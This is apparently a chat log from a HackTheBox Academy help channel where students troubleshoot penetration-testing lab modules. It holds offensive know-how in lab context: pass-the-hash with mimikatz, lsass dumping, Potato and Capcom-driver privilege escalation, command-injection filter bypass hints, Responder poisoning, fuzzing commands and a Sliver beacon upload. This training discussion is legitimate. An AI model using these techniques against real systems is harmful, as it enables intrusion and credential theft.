Gud both qualities i lack 😐

When I connected via RDP using PHT.....it worked...however after lsass dumping and running cmd as david via mimikatz using PTH..I tried to run the tool again but now I get this issue:

PS C:\tools> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
 ===============================================================
 INVOKE-HUNTSMBSHARES
 ===============================================================
  This function automates the following tasks:

  o Determine current computer's domain
  o Enumerate domain computers
  o Check if computers respond to ping requests
  o Filter for computers that have TCP 445 open and accessible
  o Enumerate SMB shares
  o Enumerate SMB share permissions
  o Identify shares with potentially excessive privileges
  o Identify shares that provide read or write access
  o Identify shares thare are high risk
  o Identify common share owners, names, & directory listings
  o Generate last written & last accessed timelines
  o Generate html summary report and detailed csv files

  Note: This can take hours to run in large environments.
 ---------------------------------------------------------------
 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
 ---------------------------------------------------------------
 SHARE DISCOVERY
 ---------------------------------------------------------------
 [*][08/10/2025 12:06] Scan Start
 [*][08/10/2025 12:06] Output Directory: c:\Users\Public\SmbShareHunt-08102025120634
 [*][08/10/2025 12:06] There appears to have been an error connecting to the domain controller.
 [*][08/10/2025 12:06] Aborting.

i wouldn't concern myself with discovering the shares since they're told to you ¯_(ツ)_/¯

well I am preparing for the exam...so you know doing this for CPTS

@rustic kestrel don't dm people without asking permission for

there's plenty of other opportunities for stuff like that; like with AEN

I see.. i was just playing around.....possibly learning assuming the problems I could face...its working😂

I am treating AEN as a blind mini exam...so preparing my best beforehand

Alr mb

Just wanted to know bout that mentoring u had in ur description

ah then say that next time in the message 😅 i treat the generic wave sticker as just a "hello" and ignore 99% of them

i am getting blank rdp window

Press enter

It's freerdp not drawing the AUP screen

"By signing in you agree" corporate windows stuff

ohh

I think if you readjust the screen size (if you set /dynamic-resolution)
It fixes it

yeah enter worked

thanks

Can someone who has completed Windows Privilege Escalation Skills Assessment - Part I / Q3: Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop. Please tips if possible?

Is it possible to make certain certificates in htb?

Hi Chat, I just solved both questions of the Understanding Log Sources & Investigating with Splunk - Skills Assesment, but i do not get how the author expected us to solve the second question: Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe - was i supposed to find the flag with a SPL search or was the flag really just based on understanding the first question of the skills assessment ? I unfortunately found the flag thanks to a writeup but it did not explain how it got the answer. Like some reddit user mentionned, i expected the flag to be whatever program started the answer of the first question.

Using CrackMapExec Module
Final Skill Assessment
Q2: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I've tried re-enumerating with my new creds A*** but I can't find anything? Could I DM someone here who's completed this?

Spend some time enumerating shares every time you get a set of credentials.

Enumerate privileges and check the module for related content. Now if you are trying to abuse a specific privilege and what is shown in the specific section isn't working, you can DM.

Thanks for the response. I'll try again, maybe I missed something.

Try some things from the spidering section.

Will do. Thanks for the nudge!

Hey guys, anybody did the LLM output attacks module? I need help in the skill assessment.

Good afternoon, I need help...
Module: Linux Privilege Escalation
Section: Logrotate
Objective: Escalate privileges and gain root

Problem: I can't make the logrotten exploit work. I have identified the file with cat /var/lib/logrotate.status and compiled the code on the target system. I have tried running the exploit a few times and performed multiple resents on the target. I searched on google and also tried searching for a solution on this channel's history.

How can I make it work? Do I need to edit the exploit code?

instead of trying to get a shell, try moving the file

Having enabled SeImpersonate and SeAssignPrimaryToken, I tried JuicyPotato, RoguePotato, and JuicyPotatoNG, but without success. Am I doing something wrong? The privileged process failed to communicate with our COM Server :( Try a different COM port in the -l flag.

Gotcha, go ahead and DM.

hello im having "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)" solutions timedatectl set-ntp 0 to disable time sync + ntpdate/rdate not solving my problem

my link in #cpts was to a specific message

aside from that, vpn region can make a difference sometimes

ahhh many thanks

isn't this step to add the cert ?

Anyone ran into the rdp connection not working at all? Currently working on file transfers but cant remote into the linux box

ive tried my own machine with multiple vpn locations at different times of day, as well as the pwnbox

the exploit works by coercing the server to give you a valid cert

is rdp the method they tell you to use for the linux machine; what section? what error are you receiving?

yes

oh god

Im going to bash my head in with a pan

it said ssh for linux, rdp for windows

(╯°□°)╯︵ ┻━┻

i was about to reply with the John Cena Gif

layer 8 issue bois, thank you @fathom pendant

https://tenor.com/view/are-you-sure-john-cena-ru-sure-about-dat-gif-14258954

listen, reading is hard as a hacker. We traded literacy for tech skills... and even then i don't think i even have that 🥀

yea thing is im leaving my cushy and easy it audit/consultancy for the infinite pain that is technical security

https://tenor.com/view/stanley-parable-the-end-repeat-text-gif-2514380344884071336

Its so much more fun and fulfilling, but ive never ever felt more incompetent, save for my Msc thesis

I am doing the Cracking Passwords with Hashcat module, but I am getting stuck cracking the common password page. I am cracking 7106812752615cdfe427e01b98cd4083 which (through hashid) gives me:
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
ofc I am not going to try all of these so I am trying the low-hanging ones like MD5 and NTLM but no luck so far. I am trying different default rulesets but esp if I have to hybrid this out I'll be running these for like hours and I think I am missing something

Any ideas/hints?

I am using the rockyou dataset as instructed, following the exercise and the hint but no luck yet:

the exercise is this:
Crack the following hash: 7106812752615cdfe427e01b98cd4083

And the hint says the following:
Use hashid to identify the hash, and then use one of the Hashcat built-in rule sets or hybrid mode to help you crack it.

I understand it might be a bit long of a message but I've been stuck on this for very long and idk what I'm supposed to be doing here, so if there's a hashcat pro in here it would be very much appreciated!

Hey guys, I'm trying to perform the "CVE-2020-0668" exploit, both locally and using the PwnBox with different US VPN, and I get the same result. Has anyone faced this issue?
Module: "Kernel Exploits" - Windows PrivEsc

Did you figure it out, I also tried spraying and brute forcing and can’t find anything :/ help lol!

Read the password policy document on the desktop carefully. It gives you a hint as to what the custom password list is supposed to look like.

That’s what I did I grepped rock you and filtered with what the pdf said :/

It also tells you the default password format

try typing "shell"

i generally dislike using the integrated terminal though

Already tried, not working

it's very clunky and i've seen it kinda fail out and freeze more than it's helped

you're better off just running the pwnbox in fullscreen and going through it

I believe the issue was the msf db connection was broken

Thanks for responding. I edited the payload to move the flag with mv flag.txt /home/htb-student/ and mv /root/flag.txt /home/htb-student/. The exploit runs completely, but I am unable to read the flag. It just renames backup to backup2 and creates an mlink to /etc/bash_completion.d. The folder disappears shortly after that, but there is no flag.

I have been trying to make this work for hours, thinking I will get it if I just try again... I appreciate your help. It would be great if you can give me another hint, otherwise I will just move on and try some other time.

well; moving might not have been the right verbiage.

Hey guys, I need help:
Module: Shells and Payloads
Section: Live Engagement
Objective: Exploit the target and gain a shell session

Problem: I'm logging into the foothold host and know that I need to go to the given IP to find a way to upload the payload I created. My issue is that the foothold host doesn't have a web browser, so I can't search up the IP through that, and if I try to search it up through the attack box it won't work. I did curl on the foothold host and it worked, but I don't know what next step to take from here

Any advice?

Open it using the terminal.

firefox in terminal

:)

i do agree though there should be a desktop icon

I feel dumb 😭 thank you guys

(speaking of desktop, there's an important file there)

hello i am curently on the footprinting module and i am at the part for smb and i need to find the domain can someone maybe give me a hint to what domain is because it isn't really clear to me ?

(alternatively you can learn how to use a pivoting tool and say "screw the foothold"

so with windows AD environments you're typically logging in as domain\user i.e. corporate.local\bob. I believe the Script scan for smb can find out some stuff, but there's stuff you can do with RPC to enumerate

oh okay so i should learn active directory ?
also i am using rpcclient to enumdomain But i don't understand the output i am getting haha sorry

i am in the beginning of the pentester path so i am still very new to this XD

i am also pretty sure i got the answer but it keeps saying i am wrong haha

ah okay but i do have a answer with rpcclient

but it says it is wrong

so it confuses the hell out of me haha

how to hack

module name:Pivoting, Tunneling, and Port Forwarding
section name: SOCKS5 Tunneling with Chisel
Question: Unable to run Chisel on the pivot host (ubuntu) because it has a different version of Go than the one it was compiled with

Statically compile it or use an older version

is it possible to link to an example or instructions how to do that? Thank you

thank you in spainsh

You go to the github for chisel, relases section, and download an older version and use it. i used 1.7.4. https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz

ah Ok

muchas gracias en ingles

got the flag woohoo thanks

hey i am still at the footprinting samba module i am stuck at the queston about finding aditional information and the one where i have to find the system path ?
any tips ?

Rpc is useful where smbclient falls short

okay thank you i will test some other stuff out then

do i connect on the specific share with rpc or just the ip ?

What does the reading tell you

just the ip but it feels like i am missing something haha that is why i asked

I believe they give you all the relevant commands

oh sorry for bothering i see it now XD

thank you for the help

In the AD Enumeration and Attacks skill assessment II, for question 8, I was able to get an Administrator NTLM hash using mimikatz, but that hash did not work to gain access to MSO1. Does anyone found an alternate way?

Was it a local admin hash from a different host?

yeap, indeed

Then the only way it would work on another host is if the local admin password was being reused across hosts.

Alright, TY! I’ll try something else.

If you have low level user access to MS01, I would do some simple enumeration that makes sense with what you are trying to accomplish or go through your mimikatz results from the other host and pass around identified credentials to see if any of them provide new access to anything.

as a note nxc is a good spraying tool; you can past a list of hosts to it to check against

nxc <protocol> host (or host list file) [options]

🫡

TY Fam!

i learned it when i was redoing the updated password attacks module

And the best way to check that would be to use nxc, right?

yep

you can create a host list like

DC01
MS01
File01

(or use the ips instead, the fqdn/name approach requires you to have it in your hosts file)

then the syntax i stated above

I am coding a file that decodes chess games and finds the most viable and most common move

i am having trouble lol

when i input to power shellpython lichess_move_aggregator.py --input lichess_db_standard_rated_2013-01.pgn --outdir results it cannot find the file even though i havbe it downloaded

the file name matches

what academy module does this have to do with?

if it has nothing to do with an academy module: read and follow #welcome and ask in #programming 😉

This kind of project — analyzing millions of chess games programmatically — relates mostly to the Data Science and Computer Science modules in an academy setting,

it has nothing to do with HTB academy (https://academy.hackthebox.com)

sorry lol

And I think nxc has an option to generate host list and then we can copy it in our hosts file

that i don't know, but maybe

https://www.netexec.wiki/smb-protocol/generate-hosts-file

it looks like it uses an ip list to generate the hosts file

Can someone help, not sure why results aren't coming back..

errors

are u scanning for vhosts here?

with ffuf and htb targets in general you use -u http://ip:port -H "host: FUZZ.academy.htb"

this is because .htb isn't a routed subdomain

also: the /etc/hosts file should never contain the port

thanks, it worked

Hi, I have a question related to the NETWORK ENUMERATION WITH NMAP module, specifically in the Host and Port Scanning section under Filtered Ports.
It mentions that a port is considered filtered when packets are rejected or dropped However, in the scan output, I see an ICMP error message with type=3/code=3 (port unreachable), and the port is marked as filtered.

Later in another module, I see the same ICMP error (type=3/code=3), but the port status is shown as closed instead of filtered.

Why does the same ICMP error code sometimes indicate a filtered port and other times a closed port? What causes this difference in interpretation?

#1234357888114364508 if you believe this to be an error

ah dug into the manual pages

https://nmap.org/book/man-port-scanning-techniques.html

the first one appears to be a Syn scan so code3/type3 -- filtered, where the second is udp, where code3/type3 returns closed

yes sir

this is not an error in the content. It's explained in the docs for nmap

I will check sir thank you

also, don't call me sir

yes, and can even provide the whole subnet in CIDR notation as well

Hi, I was trying to upgrade tty but when trying to exit I am stuck here, I cannot exit it without killing the process is there any other way out, I learnt it from getting started

Can anyone teach me cyber security i got little to no experience in this domain

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I only know how to do osint

I gave you the link to get started

@grizzled trellis #cwes message ; you'll need to utilize ffuf's filters

ok!

i believe the relevant ones are explained in the section

To add to this, you'll want to make sure you're using the command shown in the section. Your command is missing a lot of syntax.

Does anyone know how to solve the Parameter Fuzzing - GET in Attacking Web Applications with Ffuf?

The results of ffuf -u "http://94.237.49.23:41533/?FUZZ=test" -w burp-parameter-names.txt are all [Status: 200, Size: 986, Words: 423, Lines: 56, Duration: 250ms]

Read above. Fix your command syntax and use the command shown in the section. Replace xxx with the response size to filter out the same ones.

filter out 986 but no output

im sorry, im so confused lol. im trying to get into this but i dont fully understand it..

You need to connect your HTB account by following the instructions in #welcome.

Make sure to fix your syntax as well, the values in your parameters were off.

Isn't it ffuf -u "http://94.237.49.23:41533/?FUZZ=test" -w burp-parameter-names.txt -fs 986?

nope

review the command shown

actually that should work though

as long as the txt file is in your cwd

it is off though, you are using test as the value

not sure if that makes a difference here

Burp-parameter-names.txt is in the same folder. Can't I use test as the value?

idk i didn't try it, i did what the module showed

Try using a different reverse shell

Hey guys it seems like yall are helping with another module but i would love to know the answer to one of these modules. https://academy.hackthebox.com/module/312/section/3724

No one's going to straight up give you the answer, best to say which module/section/question you're on and what you need help with

I'm trying this now doesn't seem to work for me either

I am capturing the correct AP and all but it says I dont have and am missing EAPOL frames when I try to capture the handshake. I’ve tried deauthing (both broadcast and targeted) and locking onto the channel/BSSID, but still can’t get a valid capture

i think there's some thing with hashcat and pcap/pcapng

if it's what i think others have talked about here

i see. I just wanted to make sure I wasnt doing anything wrong. Im sort of new but I put so much time into this one I have a pretty good understanding now

But if it helps i can share the module and stuff if that link i sent didnt work

it shouldn't matter btw; as you're fuzzing for a valid parameter you're waiting for the size to change due to "invalid parameter" or some such message that would change the length

i haven't done that module nor do i have it unlocked, that's why i'm unsure

i figured out the issue

@royal jetty You're using the IP in your command. I don't think the page responds to that.

ah... vhosts are important

@fathom pendant what are the things you heard about hashcat and pcap?

just that for whatever reasons it doesn't like the format so you gotta use a tool like hcxpcapngtool

I tried that even and I think it was saying I didnt have enough frames. Weird 🤦‍♂️

you have to use the same URL as shown in the module but obviously you have to change the IP and port in your /etc/hosts file

http://admin.academy.htb:PORT/admin/admin.php

ffuf -w burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:57771/admin/admin.php?FUZZ=key

Progress: [6453/6453] :: Job [1/1] :: 621 req/sec :: Duration: [0:00:10] :: Errors: 6453 :::

No output

Did the client reconnect after disconnecting? You can recognize this when EAPOL is displayed in the output.
This is explained in the module in the section “The Traditional WPA Password Attack.”

You mean after i sent the deauth right? if so then yes I mean it said EAPOL which let me know SOMETHING got saved. And like there is even a WPA 2 hash when i broke down the file

its mainly when I tried to either use aircrack immediatley or transfer into to something hashcat can read i get that i dont have enough frames

I was hoping it was a HTB error but this is why i resulted here 🙂

That's because you have a lot of errors. You need to add the host to your hosts file.

You can check your capture with Cowpatty

said there was no such command as cowpatty in my rdp host

cowpatty -c -r yourfile-01.cap

ffuf -u "http://94.237.49.23:41533?FUZZ=test" -w burp-parameter-names.txt -H "Host: 94-237-49-23.uk-lon1.upcloud.host"?

When you're running airodump-ng and deauth a target, you'll see the handshake in the upper right of the airodump-ng command. that's how you know you've captured the handshake.

No, use the command you did before, but add the vhost to your hosts file.

yes I was able to see my bssid. Because im on a macbook (soon to buy a pc lol) it was kinda cut off so i could only see 02:0

but still confident that i captured traffic

It doesn't matter what you're working with. Either way, you have to connect to the HTB machine, and that's the only place you can start capturing.

of course. And yes I did rdp into the machines IP using remmina

You should be able to change resolution and see when the hash is captured

handshake*

change resolution?

you said it was cut off so you couldn't see everything

i imagine it's because of low resolution or something

you should be able to see the entire output

I wish i could send screen shots lol but on the left side of remminas UI there was a way to make it scaled and I did that. I will try again rn to make sure tho that im seeing the full output

read and follow #welcome

ok^

okay i can upload now give me a second im gonna run thru the whole process again

take care not to post content from modules above tier 0

I've modified C:\Windows\System32\drivers\etc\hosts to add 94.237.48.12 and 94-237-48-12.uk-lon1.upcloud.host. However, when I run ffuf -u "http://94-237-48-12.uk-lon1.upcloud.host:57771/?FUZZ=test" -w burp-parameter-names.txt -fs 986
:: Progress: [6453/6453] :: Job [1/1] :: 162 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
Ultimately, nothing happens.

You probably need to modify the hosts file on your VM/pwnbox, not your Windows machine

and that is not the right hostname, like i said, use the one you used previously to that

use the command given in the module, the only modifications you need to make is maybe the path to the wordlsit and the size you're filtering out

use the host shown in the module/command

What must i block out exactly?

we don't need the screenshot tbh. but you'd have to block out content from the module.

if your capture file doesn't contain the handshake, you won't get the hash. simple as that.

sheesh alright..

does your airomon-ng output show the handshake captured like i highlighted for you?

sure do

1. Change the /etc/hosts file on your VM/Pwnbox, not Windows. 2) Use the hostname they provided in the example.

Okay you got it. Now crack it, or use a tool to convert it to a format hashcat can use if you want to use hashcat.

my next issue when i try to convert the cap file

did it output a hash in the hash file?

if not maybe try restarting the target or changing servers/regions

yes and hmmm changing servers/regions is something I havent tried yet.

help upload

Hey! who could nudge me DACL II 2nd task?
I can modify logon script of a user who can link GPO but it seems he doesn't access it. This is a bug or I something missed?

FYI, the Attacking FTP module took me multiple attempts to work and spawn an FTP service on the target. I waited more than 60 seconds every time, might be useful to look into it

@tawny palm ?

There is an example command in the Sliver module

upload http-beacon.exe C:/temp/http-beacon.exe

Within the commands and tools introduction section, it showcases the usage of the upload command as so

could someone please help me with this section of the module?
https://academy.hackthebox.com/module/109/section/1036

I have just tested the command, and it is working as expected

I have a Pixel 8A Graphene OS Phone. I Want to make it an Anonymity phone. I Want to make it a Safe phone. I Need to make it an Anonymity phone. I Want to make it a Privacy friendly phone. I Want to make it a Hardened phone. I Need to make it an Anonymity phone. I Want to make it a Safe phone.

You give me advice yes?

My phone is a Pixel 8A Graphene OS Phone. I Want to make it an Anonymity phone. I Need to make it a Hardened phone. I Want to make it a Safe phone..i Need to make it an Anonymity phone. I Want to make it a Safe phone. I Need to make jt a hardened phone. You give me advice yes?

@surreal rain

Hello, Im new here please someone should help…
I have been trying to access my HTB terminal browser for some days now but it’s showing Connection time out..

the cloud VM (pwn box) or target box?

@soft moon

What do i Do?

ok 1st of all why you ping the mods, second of I dont know you and so bold of you to assume I provide him to potentially suspicious activities, whether or not its used alongside malicious actives is 1 thing but why did you post this twice?

Hello hope you are doing well a kind request any who has questions and answers for https://www.examtopics.com/exams/comptia/pt0-002/
https://www.itexams.com/exam/PT0-002 ....downloaded in the pdf file..🙏 🙏 Please any one who has them i need you help. Am getting ready for an exam in few days

This has nothing to do with the Academy. Please read the #rules and don't just ping random people.

cant pdf come with payloads embedded into them?

How can I get those questions

Downloaded

man people really struggling to not read the rules

try to study the material or use the brain is bad enough an AI could probably give what you seek

The first command fails as there isn't such a path on your system - /home/kali/HTB/Sliver/c:\temp\http-beacon.exe
The second command doesn't have the file name in the remote path
The third command is not escaping the backslash
The fourth command is missing the file name in the remote path

Please use the command that I mentioned:

upload http-beacon.exe C:/temp/http-beacon.exe

Ensure that the temp directory has been created (or present) in C:\

I figured it out was using O instead of 0
so of course it wont display anything very intersting that ip=127.0.0.1%Oals
soft locks burpsuite and never displays

@rustic sage this is not relevant to this server

hahahaha a staff / moderator is watching cant you understand hahahahaaha

Several of them actually

I have a feeling its some criminal trying to get free info lmfao goes to show some dumb rocks

actually no thats rude to rocks because rocks what got us computers xD

How do we run Responder for LLMNR Poisioning if we have a pivot host...and we cannot use Proxychains as it is only for TCP Traffic and we are talking about UDP...and Pivot does not has internet connection? and ...we are on linux pivot...if it was windows I know we could've used inveigh?

Hi

Hi every one, I try to share my learning progress via student-ID following the Q&A in the image. But I wanna where I can find that API. I dont see any thing related in the community API (https://documenter.getpostman.com/view/13129365/TVeqbmeq).

https://github.com/Qazeer/OffensivePythonPipeline/tree/main/binaries/Responder

might wanna transfer this pre-built binary, other than that you could try to form an artificial VPN if you have root access using ssh

As far as I know, there is currently no official API documentation. The documentation you posted does not cover the Academy.

does anybody having the trouble with completing the CAPE journey? feels like the labs in modules are not working as they should, its embarrassing, I already reached out to support, just asking here if anyone got the same problem

the labs just broken completely, dont know the reason even why, just wasting few hours on my hopes that it will get sorted one day magiclly itself. haha, unbearable at this point

So how we can I find the API?. Did we need to have a "third party" account to see this API. It is so weird when saying, we can share the learning process via API but API is still a mystery😆

If I remember correctly, you could store your ID with HackerOne. That way, HackerOne could see your training status.
But as far as I know, the API is not there to share your learning status with the world.

I just checked on hackerone, it have it. So, for now, I will understand that the id only support for some organization/party only.

Can someone help me think ive got a technical issue

im doing CPTS > Password attacks > attacking windows credential manager > "What is the password mcharles uses for OneDrive?"

after struggling on it i looked at a walkthrough where he gets this

Cant add images 😐

he runs cmdkey /list and gets loads, I just get the one.

Hi mate! Are you still stuck here?

I figured it out. Got it to work long back

hy any hint for this section i don't understnad what going on its messedup.
https://academy.hackthebox.com/module/67/section/605
problem is i unable to complile that UACMe repo features a comprehensive list of UAC bypasses,

Then, can I ask for your help with 2nd task in dm?

I cant try to help

Did you get connection to the target yet?

yesh i have rdp

Go to the tools directory

they run whoami /priv first SeLoadDriverPrivilege not there then they write something . The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line.
then they again run same whoami command and SeLoadDriverPrivilege comes.

SeLoadDriverPrivilege Load and unload device drivers Disabled

i want to load this SeLoadDriverPrivilege

See that is disabled

Ok go to the tools directory

ok done , cd c:\tools

go back one directory and list

ok

Show me please

PS C:\tools> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled```

BUDDDY

C:\Tools> dir

PS C:\tools> dir


    Directory: C:\tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/24/2021   3:11 PM                ExploitCapcom
-a----        5/24/2021   3:12 PM          10576 Capcom.sys
-a----        8/11/2025   2:36 AM         155134 drivers.txt
-a----        5/24/2021   3:11 PM          44920 DriverView.exe
-a----        5/24/2021   3:11 PM         119808 EnableSeLoadDriver
-a----        5/24/2021   5:25 PM          15360 EoPLoadDriver.exe```

Go to that directory and type dir.

Quit with the whoami

whoami 😅 my bad sorry

Try this

EoPLoadDriver.exe System\CurrentControlSet\Capcom

PS C:\tools> .\EoPLoadDriver.exe System\CurrentControlSet\Capcom
Tarlogic Security
Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath
   eg: EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys```

I'm not sure if it matters but i was using cmd.exe as admin

Look at the section. "Automating the Steps"

You should be able to figure that out.

Any help or hint will be much appreciated, Thankyou

Try using bloodhound and see if you find anything interesting

alrighty thankyou

Hi, I`ve been stuck on Attacking Authentication Skills Assessment, can anyone help on this one>

?

I'm doing Windows Attacks & Defense course, and I can't find the password.txt file anywhere, and I need it for some Hashcatting

Did you manage to progress?

You can DM the output and I can tell you if it is working correctly or not.

i am on Working with IDS/IPS Suricata Rule Development Part 1 unable to connect to the rdp session i tried every xrdp command known to man kind the command loads the sessions rdp screen pops and closes ─(kali㉿kali)-[~]
└─$ xfreerdp /v:10.129.5.52 /u:htb-student /p:'HTB_@cademy_stdnt!' /relax-order-checks /rfx

[07:39:24:143] [35758:00008bb0] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[07:39:24:143] [35758:00008bb0] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: *************************************************
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: This build is using [runtime-check] build options:
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: * 'WITH_VERBOSE_WINPR_ASSERT=ON'
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]:
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: [runtime-check] build options might slow down the application
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: ********************

(kali㉿kali)-[~]
└─$ xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:10.129.5.52 /dynamic-resolution /relax-order-checks +glyph-cache
[07:40:40:233] [36465:00008e71] [ERROR][com.winpr.commandline] - [log_error]: Failed at index 6 [+glyph-cache]: Unexpected keyword

FreeRDP - A Free Remote Desktop Protocol Implementation
See www.freerdp.com for more information

also tried

i have also reset the target no working still i pinhg the ip its working fine

If it is a provided wordlist, it is likely available for download via a Resources button in the Module. If there is no Resources button, then there are none to download. This screenshot is just an example of what I am talking about. I have not done that Module, so I do not know about the password.txt file.

i just continued now , i uploaded sharphound on it and got the zip on my local machine now gonna bootup bloodhound and see what can i find in there. will update you soon

ps help with my querie

Ive messaged you but need to add as friend i think!

Idk why i cant put images here rip

do anyone know the password for bloodhound on the htb instace ?

|| neo4j:HTB_@cademy_stdnt! || aint working

It should be neo4j:neo4j

it worked, thankyou @gray yacht

You can dm me 🙂

Only AnDRO, other dm's will be ignored

need help with web requests

HyperText Transfer Protocol (HTTP)

it lets me run the command curl "server_ip"/download.php

but -s -o doesnt work

just says no url specified when i add those

hey can i dm you ?

yes sure

😂

i figured it out

hadnt run the index.html command first

Thankyou soo much for sharing this!

Howdy. I'm doing the Stack Based buffer overflow module. In tn the "Take Control of EIP" it aks "Examine the Registers and submit the address of EBP as the Answer" I cannot seem to figure out what it's asking for. I've tried the content of the ebp register. I've tried overflowing the buffer to get the offset of ebp and adding that to the esp to get it's location on the stack. I just cannot figure out what it's asking for. Pic related

If my subscription ends and I'm in the middle of a module, will I lost my progress in it, or just the access to it?

I'm getting the same, did you find any solution to this?

Looking at a course I have that I was unable to finish before my subscription ended, it still shows the progress bar at the point where I was at, so I assume it will maintain your progress.

progress still there, but lost access if it is in the subcription

Thanks a lot for the explanation, guys!

could I please get some help command injection is quite hard
https://academy.hackthebox.com/module/109/section/1038
from the last section I have a got the users home dir but really brain fried on how to get the cat command to work as it either gives blank output or invalid output 🙁

yes through c'a't$ etc etc

oh really?? didnt come to me but I do some testing

so then by logic oooo im so stupid I might rest I did
c'a't'$ etc etc

yes I saw that when HTB was mentioned in the module somewhere about if a network active occurs in the network tab of inspect

ok thanks I have to re read once I get better sleep I think ive been awake too long

Hello admin, any issue with this lab - Skills Assessment - Using Web Proxies
https://academy.hackthebox.com/module/110/section/1055

I'm getting the same issue both on my local kali and the Parrot pwnbox
Using ZAP:
An exception occurred while attempting to connect to: https://94.237.58.104:51951/lucky.php
The exception was:
Unsupported or unrecognized SSL message
Root cause:
SSLException: Unsupported or unrecognized SSL message
The following document may be of assistance in resolving this failure:
https://www.zaproxy.org/faq/how-to-connect-to-an-https-site-that-reports-a-handshake-failure/

Without ZAP:
This site can’t provide a secure connection
94.237.58.104 sent an invalid response.

Try http not https

https://academy.hackthebox.com/module/77/section/844

I Have no clue how to start this off. Ive read and re-read the module at least 7 times now

Well, the question says to ssh into the machine. Have you done that part?

is that the Sudo user thing?

nope just the 'ssh' command

ssh <user>@<ip> -p <port>

right thats the problem, whats the port?

it says used the given port but im not seeinig the port

you're given ip:port; you don't do ssh user@ip:port

short answer though: remove the :38433 from the user1@ip portion in your command

Ah ibsee

Na I understood from the long. Thank you.

good luck!

Uhh I can't type now-

Its asking for a password but I cant type

Its not going to show what you type, this is intentional and a security feature of ssh

oh makes sense

thank you so much, sorry I thought I broke it XD

Sorry asking questions in another section, have anybody submitted walkthrough for a machine, I submitted a walkthrough about 3 days ago, and it still says under review, does it take that long usually

yo guys

im on bleeding edge vulns from AD enum

ive fired up the target, which is the ACADEMY-EA-ATTACK01

im supposed to ssh into it and do exploits on the DC01 on 172.16.5.5

but its offline

i used the scanner scripts for the vulnerabilities and all returned a connection problem

also nmap all ports are filtered

Jerry it is like 2019

does it take more for older machines

also why i do not have permissions for general

yoo thank you so much man i did not know there was this much sections

So, I got to the ID_RSA key looking thing but idk what to do now

Well you can copy and paste it on your system

do i run a vim for ID rsa on a seprater command line?

make a new file and copy into that

Can anyone help me on credential hunting in network shares. I only get the hr_b***** username and it's password nothing useful when I use grep -ir "pass"

how do i do that. I think im misssing somethiung let me re-read the lesson

which module you are doing?

first cat the id_rsa on the machine you are seeing...they copy content...and in your machine "nano id_rsa" and paste that content you copied from id_rsa

Phh okay thank you!

hi

I pasted it into the nano, anything else??

depends what is your task

you can login into that machine with the private key

"Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'."

where you found this ssh key?

for which user is that ssh key

basically this task is saying you to become root

do you have password?

of user2?

for User2 i dont but I do for the main user

Hi. I'm struggling with a question "Submit the size of the stack space after overwriting the EIP as the answer. (Format: 0x00000)". I believe the answer should be one of two things. The first is ffffffff - esp register. The other is ffffffff - the address after the eip register. Neither seems correct please help clarify where I'm making wrong assumptions. This is in Stack-Based Buffer Overflows on Linux x86 module section Generating Shellcode

which module

Stack-Based Buffer Overflows on Linux x86 forgot to include that my bad

yo guys

im trying to get gettgtpkinit.py but im having a python problem

oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto

although its already installed system wide

Hello

AD Enum & Attack

Skills Assessment # 2

I start responder on both interfaces, I do not retrieve any Hash....

Both?

You just need to start on the 2nd one on the internal network

Something like esc2

Sudo responder -I <2nd interface name>

Can anyone help me on credential hunting in network shares. I only get the hr_b***** username and it's password nothing useful when I use grep -ir "pass"

Which module

I'm having trouble finding Nicholas's SID. What is the client ID of "Nicholas Taylor"? It's one of the last activities of the pentest module in a nuyshell. CJCA
Help, please!

But it doesnt get any hash i left it on for like 1 hour

Have you tried only on interface 2?

Password attacks

Isnt this is the part where they also tell about netexec spidering right?

Yes

I remember a little bit , there is folder or share called tools

Yeah I tried to do it by Linux

You need to manually explore all these things

Used manspider

Nothing worked for me i guess

Yeah I did in windows too

Netexec was giving error

But all I see is a html report and some .CSV files

You got some credentials?

Yeah I got the same but then it worked from my own attack box

No

Ummm

Can you share module link

But the actual data is not in that

